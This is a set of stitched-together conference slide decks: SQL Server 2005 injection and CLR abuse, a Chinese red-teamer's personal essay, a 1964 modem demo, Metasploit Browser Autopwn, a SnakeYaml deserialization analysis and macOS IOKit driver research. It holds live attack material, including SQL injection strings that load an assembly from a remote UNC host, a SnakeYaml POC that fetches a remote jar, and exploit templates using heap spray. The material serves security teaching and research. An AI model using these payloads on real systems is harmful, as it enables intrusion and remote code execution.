Architectures
•
SQL Server 2005 makes heavy use of in-
band signaling.
•
Secure by design?
InBand Signaling++
(sp_configure)
• Early Microsoft documentation on SQL Best
Practice mentioned disabling xp_cmdshell.
– Every one of the (many) SQL Injection tools out
there uses sp_configure to re-enable
xp_cmdshell.
– This is an old lesson for SQL Server to learn!
• In fact _all_ of the features widely screamed
to be locked down, can be re-enabled within
the same channel. (the same channel that
SQL Injection rides in on!)
• This shared channel for
configuration/administration obviously buys
us some convenience, but a secure design?
sp_configure; RECONFIGURE
• Ad Hoc Distributed Queries
– (used by many tools to brute-force sa
password)
– (used by many tools for effective data
extrusion – SQL DataThief)
• xp_cmdshell
– Almost as famous as ‘ or 1=1--
• CLR Integration
– The gateway to much fun..
• In-band signals FTW!
SQL2005 – Some new features
• Other than old favorites, we are going to
look at 2 new ones:
– Native XML Web Services;
– CLR Integration.
Native XML Integration
• The marketing pitch:
“Microsoft SQL Server 2005 provides a standard mechanism for
accessing the database engine using SOAP via HTTP. Using this
mechanism, you can send SOAP/HTTP requests to SQL Server”…”
Since the SOAP/HTTP access mechanism is based on well-known
technologies such as XML and HTTP, it inherently promotes
interoperability and access to SQL Server in a heterogeneous
environment. Any device that can parse XML and submit HTTP
requests can now access SQL Server.”
• Native Soap Integration and the wiley
hacker
– Web Server DoS?
– Comfortable X-Platform Query Manager?
Web-Server DoS
• Denial of Service is boring!
• But boring will hurt you just as badly as
anything else..
Web-Server DoS
• SQLServer now interacts directly with http.sys in the
Win2k3 kernel to manage created endpoints.
• When included within a standard ‘CREATE
ENDPOINT’ call, MSDN is quite specific: “while the
SQL Server-based application is running, any HTTP
requests to this endpoint are forwarded to the
instance of SQL Server. ”
1.
2.
3.
But surely this needs privs?
• This _had_ to come up with threat modeling.
– Secure marketing docs mention: “Both the Windows
account and the SQL Server account that SQL
Server 2005 impersonates must have local Windows
administrator privileges for the HTTP endpoint
registration to succeed.”
• Bah! Sounds like we are out of luck..
– MSDN (again): “If you execute the statement in the
context of a SQL Server account, for example, sa or
some other SQL Server login, SQL Server 2005
impersonates the caller by using the SQL Service
account, specified when SQL Server is installed, to
register the endpoint with HTTP.SYS.”
• Ah.. So all we need is to be SA / in sysadmin (will
that ever happen??
SA == DoS on every IIS
Instance ?
• IIS Server running multiple sites (using
name based or IP based virtual hosting)
• SQL Service account given FileSystem
restrictions to ensure that SQL DBA cant
deface / affect other customer sites.
• Sounds like “NT Port bind, 10 years later..”
Creating endpoints for fun and
profit
'exec('CREATE FUNCTION getServerVersion()
RETURNS NVARCHAR(MAX) AS BEGIN;RETURN
(@@VERSION);END')--
' exec('CREATE ENDPOINT eepp STATE = STARTED AS HTTP
(AUTHENTICATION = ( INTEGRATED ),PATH = ''/sql/demoo'',PORTS = ( CLEAR
))FOR SOAP (WEBMETHOD ''getServerVersion''(NAME =
''demo_db.dbo.getServerVersion''),BATCHES = ENABLED,WSDL = DEFAULT)')--
1.
2.
3.
• The vector here is obvious: We wanted to
build a function or proc. That would accept
arbitrary input from SOAP, then eval() it…
• But Microsoft beat us to it…
X-Platform Query Managers
•
Did you notice the methods VisualStudio extracted from the
WSDL ?
•
MSDN: “When BATCHES are ENABLED on an endpoint by
using the T-SQL command, another SOAP method, called
"sqlbatch," is implicitly exposed on the endpoint. The sqlbatch
method allows you to execute T-SQL statements via SOAP”
getServerVersion()
Sqlbatch(BatchCommands As string, Parameters As ArrayofParameters)
' exec('CREATE ENDPOINT ep2 STATE=STARTED AS HTTP
(AUTHENTICATION=(INTEGRATED),PATH =
''/sp'',PORTS=(CLEAR))FOR SOAP(BATCHES=ENABLED)')--
1.
2.
3.
New: CLR Integration
•
The thing that made squeeza difficult to write in ‘07 was
mainly T-SQL.
•
T-SQL is Turing Complete but when trying to extract data
from a network via encoded DNS packets or timing it starts to
creak a little.. (we did it, but lost a lot of hair in the process)
•
Microsoft to the rescue (msdn): “Microsoft SQL Server 2005
significantly enhances the database programming model by
hosting the Microsoft .NET Framework 2.0 Common
Language Runtime (CLR). This enables developers to write
procedures, triggers, and functions in any of the CLR
languages, particularly Microsoft Visual C# .NET, Microsoft
Visual Basic .NET, and Microsoft Visual C++. This also
allows developers to extend the database with new types and
aggregates.”
•
Huh ?
•
Turned off by default…
– Remember slide on in-band signals &&sp_configure ?
– exec sp_configure(clr enabled),1
New: CLR Integration
• Does allow for very fine grained access
control.
• Fortunately these can all be over-ridden if
you have SA access.
• Simply it allows us to load an arbitrary
.net Assembly into SQL Server, and
depending on how we handle it, possibly
execute this binary within SQL Servers
address space.
• How do you load a .net assembly?
Loading .net Assemblies (csc)
• Create .cs file on filesystem (1)
• Call on csc.exe to compile the binary (2)
• Import the binary into SQL (3)
• Profit! (4)
(1)
(2)
(3)
(4)
Loading .net Assemblies (csc)
• There has been talk of ntsd and
debug.exe being removed in default
installs.
• Fortunately, we now have csc.exe
shipping with every deployed SQL Server!
• csc.exe is perfectly predictable:
– %windir%\system32\dllcache\csc.exe
• This is still pretty ghetto!
Loading .net Assemblies (UNC)
• Fortunately, like DLL’s this can be loaded
from a UNC share too.
• Profit!
• (Of course all of this is do-able via an
injection point)
• http://victim2k3.sp.com/login.asp?
username=boo&password=boo'%20CREATE%20ASS
EMBLY%20moo%20FROM%20'\\196.31.150.117\tem
p_smb\moo.dll'—
• But this still requires outbound \\UNC (which
is still useful for squeeza and DNS
resolution), but remains ghetto!
Loading .net Assemblies
(0x1618..)
• T-SQL Syntax allows the assembly to be
created at runtime from the files raw hex.
1.File.open("moo.dll”,"rb").read().unpack("H*
")
["4d5a90000300000004000000ffff0......]
2.CREATE ASSEMBLY moo FROM
0x4d5a90000300....
3.exec HelloWorldSP (Profit!)
• This makes creation via injection even
i
!
Assemblies and Security Privs.
• Your created binary is by default placed
inside a sand-box
• Assemblies are loaded as:
– SAFE [Calculations, No external Resources]
– EXTERNAL_ACCESS [Access to Disk,
Environement, Almost everything with some
restrictions]
– UNSAFE [God Help You! | Equivalent of Full
Trust | Call unmanaged Code / Do Anything as
SYSTEM]
• UnSafe Assemblies must be signed with a
new CLR Signing procedure or
• SA can set the Database to “Trustworthy”
What can we do with this?
• The fun is just beginning:
– Effectively loading binaries into memory
without noticeably affecting disk in an
unusual manner!
– .net assembly to launch calc.exe (as System)
– .net assembly to launch remote shell (System)
– Squeeza without the horrible T-SQL ?
– reDuh.clr. sql
[1] SQL Injection used to create CLR reDuh.exe on SQL Server
[2] Local Proxy breaks down TCP packets, submits to reDuh through SQL
Injection strings..
[3] reDuh.clr extracts packet info and
submits packets to destination
[4] Return packets are encoded by reDuh within SQL server, and fetched b
attackers proxy using Injection vector, completing the circuit.
Questions ?
References
“Advanced SQL Injection In SQL Server Applications”, Chris Anley,
2002
“Building the bridge between the web app and the OS: GUI access
through SQL Injection”, Alberto Revelli, 2008
“IServerXMLHTTPRequest/ServerXMLHTTP”
http://msdn.microsoft.com/en-
us/library/ms762278%28VS.85%29.aspx
“The Extended HTML Form attack revisited”, SandroGauci, 2008
“Programming Microsoft® SQL Server™ 2005”, Andrew J. Brust,
2006
“Writing Stored Procedures for Microsoft SQL Server”, Mathew
Shepker, 2000
“Overview of Native XML Web Services for Microsoft SQL Server
2005”, http://msdn.microsoft.com/en-us/library/ms345123.aspx,
2005 | pdf |
有幸受我师⽗鸡头的邀请,参加《鸡友故事会》,分享⼀些随笔,名字就叫四分之⼀⼈
⽣好了,我的四分之⼀。
从接触安全到现在其实已经很多年了,⼩时侯因为家⾥的电脑感染熊猫烧⾹病毒,⽼爸
修了很久,⽤尽了办法,从那个时候⼼⾥⾯就埋下了⼀个种⼦,后来拜师花钱买⼯具被骗,
我都经历过,那是⼀个阿D、明⼩⼦就可以吊打⼀⼤⽚⽹站的年代,可我却从来没有静下⼼
来,⼊⻔研究过原理,想想现在觉得蛮遗憾的,后来因为上学,放弃了很久,直到⼤学选择
专业,原来,⼼⾥的种⼦早就发了芽,违背了家⾥的意愿,最后⼀天⾃⼰偷偷修改了志愿的
顺序,放弃了家⾥安排的⼀些路,⾛上了web
的桥,我想,可能这就是⾃⼰的坚持吧,后
来和身边的⼩伙伴聊天,原来很多⼈⼼⾥都是怀着最初的那份初⼼,才⾛上了⽹安这个圈
⼦,或许后来被迫转职或者还在忙于⽣计,但⼼⾥永远记住⾃⼰当时的坚持和⾃⼰写过的故
事。
记得去年因为⼀些原因裸辞在家⼏个⽉,⼜因为⼀些原因开始找⼀份红队的⼯作,定点
⾯试了⼏家公司,遇到过很多职位诱惑和陷阱,结果有通过的,有没通过的,有合适的,也
有不合适的,迷茫过,犹豫过,想过放弃,后来还是决定坚持⾃⼰的本⼼,做⾃⼰想做的,
那个时候给⾃⼰做了⼀个三年职业规划,现在也还在每天努⼒着,我记得那个很低⾕的时
期,⾃⼰给⾃⼰写过⼀篇随笔,叫 你还想拿年轻这个词躲多久?,其中有⼀段送给⾃⼰的
话,想送给⼤家。
后来慢慢适应了现在的⽣活,有项⽬的时候就打打项⽬,在项⽬中会遇到很多很多场
景,需要解决的问题,需要优化的地⽅,技战法,然后等到不忙的时候,就把这些沉淀下
来,刷刷⽂章,学⼀学师傅们的新思路,努⼒充实⾃⼰。打过⾦融能源、打过部委政企、打
过互联⽹医疗、也打过很多知道的不知道的⾏业,有时候⾃⼰发呆在想,我们做的事,回家
的时候,都不知道怎么跟乡亲邻⾥解释哎,就好像我说我是做⽹络安全的,他们会问⼲啥
的?我说互联⽹IT搞安全,他们嘴上说着哦哦,IT精英啊,可能⼼⾥都在想,家⾥电脑下次
再坏了找他修⼀下诸如这类的种种。
后来,2020年过年的时候因为疫情没有回家,有幸参与了某项⽬重保,从那个时候就喜
欢上了⾃⼰编的⼀句话:“你负责在现实的世界⾥阳光明媚,我们在你看不⻅的世界之中默默
前⾏。”就觉得我们也变成了很了不起的⼈,在他们不理解的领域阻挡了很⼤的危害,守护了
很多⼈⼀样。重保那天我记得很清楚,2021年2⽉11号,是我在新公司正式转正的第⼀天,
也是⾃⼰在异乡异地的第⼀个新年。
那天⾃⼰给⾃⼰写了这样⼀段话,也偷偷拍下了很漂亮的烟花送给⼤家。
很庆幸⾃⼰⾛上了这条路,做技术坚持到了现在,⽽不是转了其他岗位,感谢师傅的分
享邀请,也很感谢在圈⼦⾥遇到了很多很多⼀起努⼒的⼩伙伴,⼀起⼲饭挣钱努⼒学技术,
很抱歉这次没有分享技术成⻓呀,技术⽂章啊,下次⼀定补上,对了,这是我的四分之⼀⼈
⽣,讲了⼀个关于我的故事给各位听。 | pdf |
Old-Skool Brought Back
A 1964 Modem Demo
K.C. Budd "phreakmonkey"
Taylor Banks "dr. kaos"
Modems, explained
Modulator / Demodulator
Modulator: Encodes a digital signal over an analog
representation
Demodulator: Reconstructs the digital signal from the
analog representation
Digital signal rate = bits per second (bps)
Analog "symbol" rate = baud
In many cases, bps != baud
Timeline of Modem History
~1959 "Bell 101" 110 baud standard, Anderson-Jacobson modems introduced for
private-line use by US Military
1962 "Bell 103" 300 baud standard, AT&T commercial modems introduced
~1963 Livermore Data Systems Model A
1968 "The Carterphone Decision" - allowing third party devices
to be electrically connected to telephone lines*
1972 Vadic 1200bps modem
1976 AT&T Bell 212A 1200bps standard
1981 Hayes 300bps
"Smartmodem"
Hayes AT-Command Set
1958
1968
1978
1988
Ladies and Gentlemen:
A circa 1964
Livermore Data Systems
Model A Modem
Serial # 0279
So, wait. 1964?
Isn't that older than you are?
Comment on gizmodo.com :
By: 92BuickLeSabre 10:12 PM on Thu May 28 2009
That was surprisingly bad-ass.
(Especially the part at the beginning where he ripped off the poor
grieving little old lady.)
Model A: Physical Characteristics
Hand Crafted Wood Box
Dovetail Joints
Brass Hardware
Notch-cutout for Phone Handset Cord
Labels
Model A: Technical Characteristics
Modulation: Bell 103
300 baud / 300 bps
Originate Mode Only
Frequency Shift Keying
No error correction
Directly Modulates RS232 TX line
No internal clock
No handshaking / synchronization
Requires +/- 12V RS232 levels
5V TTL levels will not work
Bell 103 Modulation FSK:
RS232 TX Line:
Carrier:
Modulated
Signal:
Originate Mode:
Mark = 1270 Hz
Space = 1070 Hz
Answer Mode:
Mark = 2225 Hz
Space = 2025 Hz
mark
space
What Use is 300 baud?
Terminal Sessions
Troubleshooting
Data Entry
Data Transfers
Program Submission
Text files
Reporting
Business reports (ledgers, inventory, &etc)
Status Monitoring
Remote Sensing
One Personal Account
From: winnall@[deleted]
To: [email protected]
Subject: Modem
Hi,
I stumbled on your youtube video. It brought back some interesting memories.
We used that model in about 64 as you surmised. The big problem was dirty
lines. If you got a line that had any noise on it, the modem used to return all
sorts of Junk. As we used it to transfer data for computation between
computers, we often did not know the dirty line existed until results started to
come out all gobbledygook. The worst case was when we some how got an infinity
loop happening in the mainframe and all terminals froze. Took some time to
diagnose and rectify!!! :-[
Bob in Oz
Other pre-1970 Modems
Livermore Data Systems Model B circa 1965
University of California, Davis
Other pre-1970 Modems
Livermore Data Systems Model C circa 1968
Stanford Computer History Museum
Other pre-1970 Modems
Livermore Data Systems Model B
Emailed by Rob / "gambit32"
Other pre-1970 Modems
Livermore Data Systems Model AH (Interim A/B?)
Emailed by Shaun from SFU.CA
Cool Acoustic Coupler Hack
Emailed by "toresbe" from Norway
DEMO TIME
or "Shut the hell up
and show us the modem!"
Demonstrating the Model A Modem
Demo 1: Connecting the modem, modulation, and noise
Demo 2: Dialing into a system at 300 baud
Demo 3: Replaying a previously recorded Bell 103 session
into the modem.
Demo 4: (Hopefully!) Making the modem talk / listen
through unusual mediums
- Cellular phone - Walkie Talkies
- PVC Pipe - Room P.A. system?
- Other?
Thanks for coming!
Thanks to:
DEFCON Organizers, Volunteers, and Goons
DC404 (dc404.org)
Livermore Data Systems
Everyone who emailed or commented
The old lady who gave me the modem
All of you for coming to my talk. | pdf |
Using Guided Missiles in Drivebys
Automatic browser
fingerprinting and
exploitation with the
Metasploit Framework:
Browser Autopwn
James Lee
2
Browser Autopwn
● Auxiliary module for the Metasploit Framework
● Fingerprints a client
● Determines what exploits might work
● Used to suck
● Now it doesn't
3
Outline
● Intro
● Cluster bombs
● Guided missiles
● Fingerprinting and targeting
● Stealth
● Demos
● Commercial comparison
4
# whoami
● James Lee
● egypt
● CoFounder, Teardrop Security
● Developer, Metasploit Project
5
My Involvement in MSF
● Started submitting patches and bug reports in
2007
● HD gave me commit access in April 2008
● Broke the repo April 2008
6
The Metasploit Framework
● Created by HD Moore in 2003
● ncurses based game
● Later became a real exploit framework in perl
● Rewritten in ruby in 2005
● Which is way better than python
● Extensible framework for writing exploits
7
I <3 MSF
● Modular payloads and encoders
● Many protocols already implemented
● Many nonexploit tools
● All kinds of exploits
● Traditional serverside
● Clientsides
8
Why Clientsides
● Karmetasploit
● Any other tool that gets you in the middle
● Users are weakest link, blah, blah, blah
● See Chris Gates
9
Client Exploits in MSF
● Extensive HTTP support
● Heapspray in two lines of code
● Sotirov's .NET DLL, heap feng shui
● Wide range of protocollevel IDS evasion
● Simple exploit in ~10 lines of code
10
Simple Exploit
content = “<html><body>
<object id='obj' classid='...'></object><script>
#{js_heap_spray}
sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000);
obj.VulnMethod(#{[target.ret].pack(“V”)*1000});
</script></body></html>“
send_response(client, content)
11
Or Arbitrarily Complex
● ani_loadimage_chunksize is 581 lines of code
● As of June 28, MSF has 85 browser exploit
modules
Problem
Solution
14
Cluster Bomb Approach
● Is it IE? Send all the IE sploits
● Is it FF? Send all the FF sploits
● Originally exploits were adhoc
● Pain in the ass when new sploits come out
Problem
Solution
17
Guided Missile Approach
● Better client and OS fingerprinting
● less likely to crash or hang the browser
● Only send exploits likely to succeed
● Browser is IE7? Don't send IE6 sploits, etc.
18
Fingerprinting the Client
● User Agent
● Easy to spoof
● Easy to change in a
proxy
● A tiny bit harder to
change in JS
19
Fingerprinting the Client
● Various JS objects only exist in one browser
● window.opera, Array.every
● Some only exist in certain versions
● window.createPopup, Array.every, window.Iterator
● Rendering differences and parser bugs
● IE's conditional comments
20
Internet Explorer
● Parser bugs, conditional comments
● Reliable, but not precise
● ScriptEngine*Version()
● Almost unique across all combinations of client and
OS
● Brought to my attention by Jerome Athias
21
Opera
● window.opera.version()
● Includes minor version, e.g. “9.61”
22
Hybrid Approach for FF
● Existence of
document.getElementsByClassName
means Firefox 3.0
● If User Agent says IE6, go with FF 3.0
● If UA says FF 3.0.8, it's probably not lying, so
use the more specific value
23
Safari
● Still in progress
● Existence of window.console
● If Firebug is installed on FF, shows up there, too
● Availability of window.onmousewheel
● Defaults to null, so have to check typeof
24
Fingerprinting the OS
● User Agent
● Could use something like p0f
● From the server side, that's about it
25
Internet Explorer
● Again, ScriptEngine*Version()
● Almost unique across all combinations of client
and OS, including service pack
26
Opera
● Each build has a unique opera.buildNumber()
● Gives platform, but nothing else
27
Firefox
● navigator.platform and friends are affected by
the User Agent string
● navigator.oscpu isn't
● “Linux i686”
● “Windows NT 6.0”
28
Others
● Really all we're left with is the User Agent
● That's okay, most don't lie
● And those that do are likely to be patched anyway
● Generic, works everywhere when UA is not
spoofed
29
Future Fingerprinting
● QuickTime
● Adobe
● Less wellknown third party stuff
30
ActiveX
● “new ActiveXObject()” works if you have
the class name
● Otherwise, IE doesn't seem to have a generic
way to tell if an ActiveX object got created
● document.write(“<object ...>”)
● document.createElement(“object”)
31
Solution
● typeof(obj.method)
● 'undefined' if the object failed to initialize
● 'unknown' or possibly a real type if it worked
Target Acquired
33
What is it Vulnerable to?
● Coarse determination serverside
● JavaScript builds fingerprint, sends it back to the
server
● Server sends sploits that match the browser and
OS, possibly version
● Fine determination clientside
● navigator.javaEnabled exists, try
mozilla_navigatorjava
Select a Missile
● Sort by reliability
● Exploits contain
their own JS tests
Problem
36
Solution
37
Obfuscation
● Randomize identifiers
● Build strings from other things
● JSON / AJAX
● Obfuscation is not crypto
38
Encryption
● Put a key in the URL
● Not available in the standalone script
● Simple XOR is enough to beat AV and NIDS
● If they figure it out, it's easy to make the crypto
stronger
39
Demonstrations
40
And we're back...
● I hope that worked
● Now how do YOU make exploits work within
this framework?
41
Writing Exploits
● Add autopwn_info() to top of exploit class
● :ua_name is an array of browsers this exploit
will work against
● :vuln_test is some javascript to test for the
vulnerability (unless it's ActiveX)
● Usually comes directly from the exploit anyway
42
Example: mozilla_navigatorjava
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::FF,
:javascript => true,
:rank => NormalRanking,#reliable memory corruption
:vuln_test => %Q|
if (
window.navigator.javaEnabled &&
window.navigator.javaEnabled()
){
is_vuln = true;
}
|,
})
43
Example: ms06_067_keyframe
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'KeyFrame',
:classid => 'DirectAnimation.PathControl',
:rank => NormalRanking #reliable memory corruption
})
44
Example: winzip_fileview
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => 'CreateFolderFromName',
:classid => '{A09AE68FB14D43EDB713BA413F034904}',
:rank => NormalRanking #reliable memory corruption
})
45
Browser Autopwn Summary
● Reliable Target Acquisition
● Smart Missile Selection
● Stealthy from an AV perspective
● Easy to extend
● Detection results stored in a database
46
Commercial Comparison
● Mpack
● Firepack
● Neosploit
● Luckysploit
47
Mpack, Firepack
● Hard to acquire
● Old exploits
● Detection is only serverside
● Hard to change or update exploits
● Obfuscation + XOR
48
Neosploit
● Compiled ELFs run as CGI
● Unless you get the source or do some RE, you
won't really know what it does
49
Luckysploit
● Real crypto (RSA, RC4)
● Even harder to acquire
50
Browser Autopwn
● Easy to write new exploits or take out old ones
● Free (threeclause BSD license)
● Easy to get (http://metasploit.com)
● Not written in PHP
● OS and client detection is clientside, more
reliable in presence of spoofed or borked UA
51
Future
● More flexible payload selection
● Stop when you get a shell
● Maybe impossible in presence of NAT/proxies
● Easiertouse JS obfuscation
● UAProf for mobile devices
● Integration with MetaPhish
52
Download it
● svn co http://metasploit.com/svn/framework3/trunk
● Submit patches to [email protected]
Thanks
● hdm, valsmith,
tebo, mc, cg, Dean
de Beer, pragmatk
● Everybody who
helped with testing
● Whoever created
ActiveX | pdf |
S-SnakeYaml反序列化
SnakeYaml 基本使用
导包
序列化
MyClass 类
序列化测试
<dependency>
<groupId>org.yaml</groupId>
<artifactId>snakeyaml</artifactId>
<version>1.27</version>
</dependency>
package test;
public class Myclass {
String value;
public Myclass(String args){
value=args;
}
public String getValue(){
return value;
}
}
package test;
import org.junit.Test;
import org.yaml.snakeyaml.Yaml;
import java.util.HashMap;
public class tes {
@Test
public void test(){
Myclass obj = new Myclass("this is my data");
HashMap<String, Object> data = new HashMap<>();
data.put("Myclass",obj);
Yaml yaml = new Yaml();
String dump = yaml.dump(data);
System.out.println(dump);
}
}
结果
前面的 !! 是用于强制类型转化,强制转换为 !! 后指定的类型,其实这个和 Fastjson 的 @type 有
着异曲同工之妙。用于指定反序列化的全类名
反序列化
yaml 文件
反序列化测试
结果
反序列化漏洞
漏洞复现
POC
Myclass: !!test.Myclass {}
name:"zhangsan"
sex:man
age:20
id:1000001
package test;
import org.junit.Test;
import org.yaml.snakeyaml.Yaml;
import java.io.InputStream;
public class unserial {
@Test
public void test(){
Yaml yaml = new Yaml();
InputStream resourceAsStream =
this.getClass().getClassLoader().getResourceAsStream("test.yaml");
Object load = yaml.load(resourceAsStream);
System.out.println(load);
}
}
name:"zhangsan" sex:man age:20 id:1000001
结果
上面只是简单的进行 url 访问,要想深入利用,可以参考该项目:yaml反序列化payload
SPI机制
SPI ,全称为 Service Provider Interface ,是一种服务发现机制。它通过在 ClassPath 路径
下的 META-INF/services 文件夹查找文件,自动加载文件里所定义的类。也就是动态为某个接口
寻找服务实现。那么如果需要使用 SPI 机制需要在 Java classpath 下的 META-INF/services/
目录里创建一个以服务接口命名的文件,这个文件里的内容就是这个接口的具体的实现类。
SPI 实现原理:程序会 java.util.ServiceLoder 动态装载实现模块,在 META-INF/services 目
录下的配置文件寻找实现类的类名,通过 Class.forName 加载进来, newInstance() 反射创建对
象,并存到缓存和列表里面。
import org.yaml.snakeyaml.Yaml;
public class demo {
public static void main(String[] args) {
String malicious="!!javax.script.ScriptEngineManager
[!!java.net.URLClassLoader [[!!java.net.URL [\"http://wopjpp.dnslog.cn\"]]]]";
Yaml yaml = new Yaml();
yaml.load(malicious);
}
}
漏洞分析
前面说到 SPI 会通过 java.util.ServiceLoder 进行动态加载实现,而在刚刚的 exp 的代码里面
实现了 ScriptEngineFactory 并在 META-INF/services/ 里面添加了实现类的类名,而该类在静
态代码块处是我们的执行命令的代码,而在调用的时候, SPI 机制通过 Class.forName 反射加载
并且 newInstance() 反射创建对象的时候,静态代码块进行执行,从而达到命令执行的目的。
首先在代码执行的位置下断点,然后查看程序执行反序列化的调用堆栈.
根据上面的堆栈,追踪到
org.yaml.snakeyaml.constructor.BaseConstructor#constructObjectNoCheck
此处计算 this.constructedObjects.containsKey(node) 为 False ,所以会执行
constructor.construct(node) ,因此需要先查看 Construct constructor =
this.getConstructor(node)
这里先查看一个这个 node 参数是什么,是一个多重嵌套的结构,内容就是其中序列化之后yaml字符
串的内容.每一个键都是一个node
之后通过计算 this.constructedObjects.containsKey(node) 为 False ,进入到
constructor.construct(node) 中.
强制进入,跳转到 org.yaml.snakeyaml.constructor.Constructor#getConstructor 方法当中.
之后继续进入 getClassForNode 方法.
首先通115行,从this.typeTags这个hashMap中取tag值,没有的话就通过
node.getTag().getClassName获取类名,为 javax.script.ScriptEngineManager ,这里与我们的
传值有关,所以再看一下需要反序列化的payload: !!javax.script.ScriptEngineManager
[!!java.net.URLClassLoader [[!!java.net.URL [\"http://192.168.87.1/yaml-
payload/yaml-payload.jar\"]]]] .
获取到类名之后通过 getClassForName 获取到类对象.之后返回的也是获取到的类对象.
程序返回,然后再进入construct方法中
此处第160行通过 node.getType().getDeclaredConstructors(); 获取到全部的构造方法,而这
个 node.getType 是上一步获取的那个类对象,也就是 javax.script.ScriptEngineManager 的类
对象.
之后通过一系列的计算,最后需要通过这个 newInstance 方法去创建对象.
在上述的payload里面,每一个键都是一个类,所以创建对象的这一个步骤会多次调用,分别创建不同
的对象,在创建 javax.script.ScriptEngineManager 对象时就会触发payload.那么此处到底是
如何在创建 javax.script.ScriptEngineManager 时触发代码的,这个需要深入了解 SPI 的实现
机制
SPI 机制
将断点停在创建 javax.script.ScriptEngineManager 对象的位置.
通过一路的反射调用,进入 javax.script.ScriptEngineManager 的构造方法中.
进入 init 方法当中
再进入 initEngines 方法,在此第123行,进行 iterator 取值时会触发payload,此处迭代器取
第二个数据时触发。
首先还需要使用 hasNext 方法,判断是否存在,在 hasNext 的过程中,会调用一个
hasNextService 方法去寻找 META-INF/services/javax.script.ScriptEngineFactory 中的
配置,判断是否存在,如果存在就返回True
然后通过 next 方法取值。深入跟踪一下这个 next 方法
此处涉及到第370行,通过 URLClassLoader 的方法加载远程的jar包。
最后在380行通过反射创建对象,触发 payload | pdf |
)
((
( (((
)()()
Alibaba Security
1
• Xiaolong Bai
• Alibaba Security Engineer
• Ph.D. graduated from Tsinghua University
• Published papers on the top 4: S&P, Usenix Security, CCS, NDSS
• Twitter, Weibo, Github: bxl1989
• Min (Spark) Zheng
• Alibaba Security Expert
• Ph.D. graduated from The CUHK
• Twitter@SparkZheng Weibo@spark
Alibaba Security
Self Introduction
Agenda
• Overview
• Drivers in Kernel
• Userland Perspective
• New Vulns in Drivers on macOS
• Two new vulnerabilities
• New exploitation strategies
• Privilege escalation on the latest macOS
• Obstacles when analyzing Apple drivers
• Ryuk: a new tool to analyze Apple drivers
• Design
• Effects
• Implementation
• Benefits
Alibaba Security
Overview
• Every driver is a kernel extension (.kext) sharing the same space
with the kernel
• System daemon kextd is responsible for loading and unloading
drivers
• Location of driver binaries:
• On macOS: /System/Library/Extensions
• On iOS: integrated with kernel in kernelcache
Alibaba Security
Drivers in Kernel
• Programmed in C or C++
• Info.plist: configuration file in drivers for their property and usage
Kernel libs used in the driver
Class name to provide service to userspace
Class name of the driver
Alibaba Security
Drivers in Kernel
• Kernel APIs (KPI): APIs can be used by drivers to live in kernel
• /System/Library/Frameworks/Kernel.framework/Resources/SupportedKPI
s-all-archs.txt (on macOS)
• Basic KPI Modules:
• com.apple.kpi.iokit: For programming drivers, Apple provides an open-
source framework called iokit, which includes basic driver classes
• com.apple.kpi.libkern: a restricted c++ runtime lib in the kernel
• excluded features—exceptions, multiple inheritance, templates
• an enhanced runtime typing system: every class has an OSMetaClass object which
describes the class’s name, size, parent class, etc.
Alibaba Security
Drivers in Kernel
• A sample driver
Header File
Code File
Alibaba Security
Drivers in Kernel
• A sample driver
Header File
Code File
Parent of all drivers
Declare Con/Destructors
Callback methods of IOService
to be overriden by the driver
Auto Gen Con/Destructors
Class name of the driver
Alibaba Security
Drivers in Kernel
• In order to provide service to programs in userspace, drivers need
to implement userclients
• Userclient: Kernel objects to provide service to programs in
userspace
• Create in two ways:
Info.plist
Callback Method of Driver
Alibaba Security
Drivers in Kernel
• A sample UserClient
Unique callbacks of UserClient
Alibaba Security
Drivers in Kernel
• IOUserClient provides services through several callback methods:
• externalMethod: Provide methods that can be called in userspace
• clientMemoryForType: Share memory with programs in userspace
• registerNotificationPort: When userspace register to receive notification
• clientClose: When userspace program close connection with the
userclient
• clientDied: When program in userspace connected to the userclient is
dead
• getTargetAndMethodForIndex: Similar to externalMethod, but old fashion
• getAsyncTargetAndMethodForIndex: Similar to above, but async
• getTargetAndTrapForIndex: Similar to externalMethod, but seldom used
Alibaba Security
Drivers in Kernel
• externalMethod: Callback to provide methods to userspace
program
• IOReturn IOUserClient::externalMethod(uint32_t selector,
IOExternalMethodArguments *arguments,
IOExternalMethodDispatch *dispatch,
OSObject *target, void *reference);
• selector: to select method in userclient
• arguments: arguments passed to the selected method
• dispatch: a struct representing the method to be called
• target: the target userclient for the method to be called on
• reference: reference to send results back to userspace program
Alibaba Security
Userland Perspective
• Apple provides IOKit.framework for programs in user space to
interact with kernel drivers
• Though public, explicit invocation in iOS will be rejected by App Store
• Important APIs in IOKit.framework:
• IOServiceGetMatchingService, IOServiceGetMatchingServices
• IOServiceOpen, IOServiceClose
• IOConnectCall…Method, IOConnectCallAsync…Method
• IORegistryEntryCreateCFProperty, IORegistryEntrySetCFProperty
• IOConnectMapMemory, IOConnectUnmapMemory
• IOConnectSetNotificationPort
Alibaba Security
Userland Perspective
• The calling sequence to interact with a driver
IOServiceGetMatchingService à Get the service of the the target driver
IORegistryEntryCreateCFProperty à Get the driver’s property
IORegistryEntrySetCFProperty à Set the driver’s property
IOServiceOpen à Connect to the target driver
IOConnectCall…Method à Call the driver’s method through the connection
IOConnectCallAsync…Method à Call method, asynchronously
IOConnectMapMemory à Get a memory mapped by the driver
IOConnectSetNotificationPort à Prepare to receive notification from driver
IOServiceClose à Close the connection
Alibaba Security
Userland Perspective
• Sample code of using service of IOKit driver
Get the service of IOFireWireLocalNode
Set property hello’s value as hello
Connect to the target service, open IOFireWireUserClient
Call the driver’s method, through the connection
Close connection with the target driver
Alibaba Security
Userland Perspective
• APIs in IOKit.framework are wrappers of Mach Traps (kinda syscall) ,
which are generated by Mach Interface Generator (MIG) and
eventually call into callback methods implemented by userclients
API
Mach trap
MIG generated
implementation
Real Implementation
of Mach trap in kernel
Callback methods
of userclients
IOConnectCallMethod
io_connect_method
_Xio_connect_method
is_io_connect_method
IOUserClient::externalMethod
Userspace
Kernel
Alibaba Security
Userland Perspective
• Despite of strict sandbox restriction, some userclients in IOKit
drivers can still be accessed by sandboxed apps on iOS.
• Through experiments, we confirm these available userclients and
their correponding IOKit device driver names on iOS 11
